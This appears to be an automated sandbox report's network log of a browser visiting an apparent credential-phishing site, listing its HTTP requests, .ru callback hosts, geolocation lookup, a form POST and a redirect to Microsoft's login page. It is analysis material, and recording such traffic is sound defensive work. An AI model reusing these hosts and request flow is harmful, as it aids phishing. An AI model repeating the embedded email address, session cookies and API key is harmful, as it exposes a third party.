laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /ijq0GXuThn3eYSabiYAx9qo9lB6ksy0fMmudSZKutxyUkYF0XxMNi130dfxbM4xef210 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /opDKN2QliBSAjkfGHHCvfE9bIDoWuqGqXD12ZVJwljwbfR0D65xwnlt20ekckBZU8kgTjcd238 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /stQkM4Uk4MddyBfBYuWKxUiORNFVu3l67OFUF9h0Utq8kgczgm10O7gzhdgaHwUyVggh251 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /klBcnDvaiorUutbh5B3Adjn4Q5P6J55tBLVCjJ9xNFE56CgQsKJMuRo2uconQpvHSdX2RE5pEuv214 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InVVWlgwUUZNanRLNDNPYlIycCt6d3c9PSIsInZhbHVlIjoiTW93M0ptMkZ5bnlySTNGdGk1a3F4V0JaK0liQVVPWTFIL2huS1FObVRFZ2lHcm9Xb0QzY1dJQ1MvdnoycGEwbXlNMXVTWUw1Z0tvOEloU21HNEF5cE5MT0ZSSWtRMk04K2pTZ1Jia3ppcG1hLzNWWk5YS1h1elJJK04ybHV0SHQiLCJtYWMiOiJlZDc3OTljNDZhYTJlZjg0ZTM1N2M2YTA1ODQzMzk3Y2U2N2RkNDNhNmY5MWNkM2EwYjdiNjYyOGY1NTk0MzA5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlCcVlySkhOeSs4cHBJODVLVytUR3c9PSIsInZhbHVlIjoiQkNMdW9IVjRxM1FFMThrQXJwZHlpSzhyVDdNb2lUYUxYeDgrUWY4dXAvYzllRTZyQzR5RERLR2FsRVJCTHRPUzdiYmRZckorbnBzK2RYWmF3UGVEM2pyS2J2V2tKUURxNUZ2WFcxMS9aa0VtNUZwbDhSQUMzWlE5S0ZKRlo2YzAiLCJtYWMiOiIxYjU4YWM4OWRhMGVhNjEwZGE3M2Q2MzI1OThhOGZkZWFjNWM0ZmZlZTQyMGUyZjk0M2ZjMDI5Yjc4NTM4NDI2IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnb HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImwwcUErSEV3M1lkQlpNTDhtdHJMZ3c9PSIsInZhbHVlIjoiOHNiVnN0Vm1JQTlFLzFOMGVZLzVoZjFIdTg2NXFQRkRTYzNFRnBUV1lIdVYwb3JacGlnT0JrcHYzeXBDejBNZHVHczlCT3Nidk5uWENnSGZPUWJ4N0hRZ3BQN0dMTnpjbkh1T0lqVGFsMS9OYjVVOGNiWDZ5NkxmZlE2NkNOUEYiLCJtYWMiOiI2NWIwZTcwNTQ4NWFmYThiMTQ1MDU5MmNhMDM0YTM1N2Q2NGU0NzNmYzE0N2EzMGI3OGYxMGU5ZmM5N2RmMTYwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVhV3JzN0FFcVVDUDR2ZEVZdlVEdFE9PSIsInZhbHVlIjoiNWJNbllINnA1YlZ2RldrMFV1Tk1hYmttVm5YaEd4ZnhhWTU4ODMvVjdNV0pYRnBscnk0dlkvVGRwaWdFSmFzVVY0c015ZTI3SWpNLzd5YXdjNDBpYTNSdGtMZ0RsSWs0SjdxM3ZBRldLVDJMcDRPL3g2bE9ocGlCeWZqUCtENSsiLCJtYWMiOiIwMDIyOWE5MTlhZjA1MTRhN2UwN2U0NWE5M2NlMGNmM2U4MGU5Mjc3NDMwMzcyYTdiMjc4MzM0NjExNTI2YWMyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://y0x6.tjsqawfetli.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /029543793987973306635WbqhgQMMUHNQKHCMLDDVEJTEMHELOYCHTEGFUQUSSXPUYQFWTrsrtAQvOyzqVkXwx39 HTTP/1.1Host: g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /kl6EM2sFTprk4bUXtznm4INqmZtayxEMabyOlGpv3089VNZki7P5sID5CIzlx5KFZ5Wd8zmEVPvab225 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://y0x6.tjsqawfetli.es/bbsunjtjcqlsmdqdqqtzaNAKEL35UCCCKE9MWG0CX?KZFGFWOCQOMMGTTESKSXVAUCSLAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImwwcUErSEV3M1lkQlpNTDhtdHJMZ3c9PSIsInZhbHVlIjoiOHNiVnN0Vm1JQTlFLzFOMGVZLzVoZjFIdTg2NXFQRkRTYzNFRnBUV1lIdVYwb3JacGlnT0JrcHYzeXBDejBNZHVHczlCT3Nidk5uWENnSGZPUWJ4N0hRZ3BQN0dMTnpjbkh1T0lqVGFsMS9OYjVVOGNiWDZ5NkxmZlE2NkNOUEYiLCJtYWMiOiI2NWIwZTcwNTQ4NWFmYThiMTQ1MDU5MmNhMDM0YTM1N2Q2NGU0NzNmYzE0N2EzMGI3OGYxMGU5ZmM5N2RmMTYwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVhV3JzN0FFcVVDUDR2ZEVZdlVEdFE9PSIsInZhbHVlIjoiNWJNbllINnA1YlZ2RldrMFV1Tk1hYmttVm5YaEd4ZnhhWTU4ODMvVjdNV0pYRnBscnk0dlkvVGRwaWdFSmFzVVY0c015ZTI3SWpNLzd5YXdjNDBpYTNSdGtMZ0RsSWs0SjdxM3ZBRldLVDJMcDRPL3g2bE9ocGlCeWZqUCtENSsiLCJtYWMiOiIwMDIyOWE5MTlhZjA1MTRhN2UwN2U0NWE5M2NlMGNmM2U4MGU5Mjc3NDMwMzcyYTdiMjc4MzM0NjExNTI2YWMyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /kl6EM2sFTprk4bUXtznm4INqmZtayxEMabyOlGpv3089VNZki7P5sID5CIzlx5KFZ5Wd8zmEVPvab225 HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImwwcUErSEV3M1lkQlpNTDhtdHJMZ3c9PSIsInZhbHVlIjoiOHNiVnN0Vm1JQTlFLzFOMGVZLzVoZjFIdTg2NXFQRkRTYzNFRnBUV1lIdVYwb3JacGlnT0JrcHYzeXBDejBNZHVHczlCT3Nidk5uWENnSGZPUWJ4N0hRZ3BQN0dMTnpjbkh1T0lqVGFsMS9OYjVVOGNiWDZ5NkxmZlE2NkNOUEYiLCJtYWMiOiI2NWIwZTcwNTQ4NWFmYThiMTQ1MDU5MmNhMDM0YTM1N2Q2NGU0NzNmYzE0N2EzMGI3OGYxMGU5ZmM5N2RmMTYwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVhV3JzN0FFcVVDUDR2ZEVZdlVEdFE9PSIsInZhbHVlIjoiNWJNbllINnA1YlZ2RldrMFV1Tk1hYmttVm5YaEd4ZnhhWTU4ODMvVjdNV0pYRnBscnk0dlkvVGRwaWdFSmFzVVY0c015ZTI3SWpNLzd5YXdjNDBpYTNSdGtMZ0RsSWs0SjdxM3ZBRldLVDJMcDRPL3g2bE9ocGlCeWZqUCtENSsiLCJtYWMiOiIwMDIyOWE5MTlhZjA1MTRhN2UwN2U0NWE5M2NlMGNmM2U4MGU5Mjc3NDMwMzcyYTdiMjc4MzM0NjExNTI2YWMyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /029543793987973306635WbqhgQMMUHNQKHCMLDDVEJTEMHELOYCHTEGFUQUSSXPUYQFWTpqAEHgVmsrUA712HEwEQauv40 HTTP/1.1Host: g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnb HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImVQeWR3cG5lSEx5aDdCTFEvNUhFMmc9PSIsInZhbHVlIjoicXVCamRreHFTajBDbXFYRnJNVHR2RVdRbzJxeEQ1R1RORzM0TTBJS0pxTmY4RWZlNzc3SmliWWVvaS9jYXhsSDUzYTRLK3lBalJvMDg3RzlQZ0hkVXhjVGxXaWR6SVdSVUZZUnlKUi9rMVI1V1E5ZGNGMEQ2WVZsdENtRUtzc3MiLCJtYWMiOiIyMWQ4MjE5NTI5NTlkYThjZTMyYjYzOWExM2M4ZjY3ODliN2MyYjBhYmNlYTE4N2JlMWJkZWUzOWU3MzMwMGE4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik5UbDdnOEtXdmM3Y2N6eFA2aGVyZmc9PSIsInZhbHVlIjoiTzBLMDc5eittOWdjUnVheFhMUFVtSVB2OUxxU1ROb3Rlakd1c3VtaU5HaGJ4UkRSOFpkNWRkMWVkOXZmTWgydTBjTzNsSHRTRWtIT29PYTZrVU1TaG9mT1hWRmU0MWhYbGh2Q2d3MkthaW83ZXBzMjR4WUl5TWQ2TzQ3RXVoakgiLCJtYWMiOiI4NWUxMzgwMGM0MDU4ZjA3MWU4OGM4YjczZjBmMjI1Y2Y2Yzk5ZWRkNTM4ZDQ5NDViMTJhZjQ1ODI1Y2EwZjU3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /hxkiCCfJLo900zRSkQ6C8BeFyMy8WtsetRziWWoR44Ji50IdGyaFWzS7dCnb HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im04OXRnWktrM3JXNEdiVkdlUG9RTUE9PSIsInZhbHVlIjoiczJBdDFJQnYzVGJyZ2FyR3pISUpFL0tCaGFFdUtYbHJsc3pjVmZvcE9sN3A4SDdiUWt0UDNpMlM3SkJQQ3NHOUcvSVVQRDB3QTRNTjl6MnJVdHlyWVcyV1IzVjhib3RRQ3oxK1Jyek5vREh1L1doeFVGZkg5MkViUXF0QnVxVGQiLCJtYWMiOiJmNGE4OTNkNTE4ZWQwZWFmYmY1NzAwMGEyYWYzNmFiM2MwZWVlYTE4OWZiYTlhZGM3NWE3MDc5ZGUzY2E5M2JjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjNwL2JkZk1vd0FZbDRUdjh1MVVNY0E9PSIsInZhbHVlIjoieDAwSU5MWk1pWnpvMmU0NkNacVdEeUpCMnVENURzYkpka0lSMXJoUCs2NU5mY1JTRXo5VWM3TEg1dks1VEVaNHljK1YzWVNTU012ZmlVMmo3MXpKUG1aeC8wZ1ZHQ3Ewdkk3cFR4UjNaVm9mVWovR2ZyUnhxQTd5SlowSU5wemYiLCJtYWMiOiJjZmRhOGJmMGQ3OGQzYWZjMGYxOTZjZDRiODIwYTEzNzMxODBhN2YyYTMyYjY0MDgxZDFjNTE3ZWVhMzg4YjQyIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /common/SAS/ProcessAuth HTTP/1.1Host: login.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=f2hyr42LPv6Bsos4QWs27vKhr2tQw4Kp-3dh3-X43PHKIseTaMctpzKAgZqyPZNb0efqO0Y3ZAtdX3onJQR7MHgpd_zUfNN1Q4OnDg15v8shUHZY0KP_PyF8arPtp1Iudw0l-KXLjxbguFaA-Ss-u-6_o806oufVeskADRD_MFgsbcdz_ZVmLki-e0iZhvQ4NN0QtnHc-AP24Ig1lQ5pWU9HAceN
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.bestbuy.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://y0x6.tjsqawfetli.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: csnrda.net
              Source: global trafficDNS traffic detected: DNS query: y0x6.tjsqawfetli.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: 7j87.nmpjkg.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: www.ivo-security.blog
              Source: global trafficDNS traffic detected: DNS query: wireframepro.mockflow.com
              Source: global trafficDNS traffic detected: DNS query: addins.verityrms.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: app.mockflow.com
              Source: global trafficDNS traffic detected: DNS query: get.geojs.io
              Source: global trafficDNS traffic detected: DNS query: g1vwicriviownz85jhmnyjeprlqjjem9vcgtgvdudgzx0wizff.xpwqud.ru
              Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
              Source: global trafficDNS traffic detected: DNS query: ogads-pa.clients6.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: www.bestbuy.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
              Source: unknownHTTP traffic detected: POST /mx5ja6d20FTRDDd2WxrmtuhjDo5d HTTP/1.1Host: y0x6.tjsqawfetli.esConnection: keep-aliveContent-Length: 793sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuMA032TKRKwngcaAsec-ch-ua-mobile: ?0Accept: */*Origin: https://y0x6.tjsqawfetli.esSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://y0x6.tjsqawfetli.es/NjgSso0i/*kirstie.rees@quiltercheviot.comAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImR3TnZVSEEvRlhRSk81VWdiSkdkT3c9PSIsInZhbHVlIjoieXpOeVp6YnVDb0JDUzFna3pmSUV6WlRHMExhU0xBUjR0V1V1T2VSalU1WDNTZ01GOHdFWVhjbzhSYllxVm4wbDFaRDdQZ0x6dHp2V09aVERKQjJNMVlLaWlCSDdGbTVtVVJ5dG5LV1R3ZUs3bVFiVDV4WUMzN0pNdm82UDZ3QjMiLCJtYWMiOiI0YzAyYjMzNmI1MjJlNjBlMDQ1OGIxYWFiZGE5ZTk5M2VhZTdlOWEzMzExYTZkMTJlMGFlMTAzZGQ5ZWRkNWI4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpYWHBENm1qWFh5Mng5b2FnMUFKTnc9PSIsInZhbHVlIjoibFZKazZTYzEzNUxObFZEY00xTnJkYUp4SWhRWDRDS3Z2eStxUjkvQmZsRVVZeGRwSXVUWFFWb1ZJUStZR2JQM1E3Mk5rV2FpcEhNUTZtbVlSRzU1c2NjcDdBNk5mQU1Xc1lEa2t2TnZrU3RiRXp0bSt6cUd4Vmh3Lyt2WXBkRDUiLCJtYWMiOiI0ODE5MDVkN2IwNjRhOWVhZTQ1YWIwNDZmZDFlZjYwMGQzNWQ5MjUwMDBlMmQwZTQ1ZDQ0MTE1MzNiZmE3MWFhIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:11:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ScnU%2Bmd9%2FyqFY8wwY3dlrkFZNsxajPsgraupLPpBGC0w7o%2BXouBA5msxApfEnAgBMXQN5TGFkWHwHbn4Ef6SNUH94zQcA%2BK3VpgrnODH001n4n4BvkutG22jsQDv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=5695&min_rtt=5621&rtt_var=1630&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2045&delivery_rate=495994&cwnd=251&unsent_bytes=0&cid=3d05e4f5ac5d88d6&ts=160&x=0"Server: cloudflareCF-RAY: 9267954fcb0ac402-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85152&min_rtt=84936&rtt_var=18094&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1706&delivery_rate=35823&cwnd=252&unsent_bytes=0&cid=a85f41248973bbf7&ts=524&x=0"
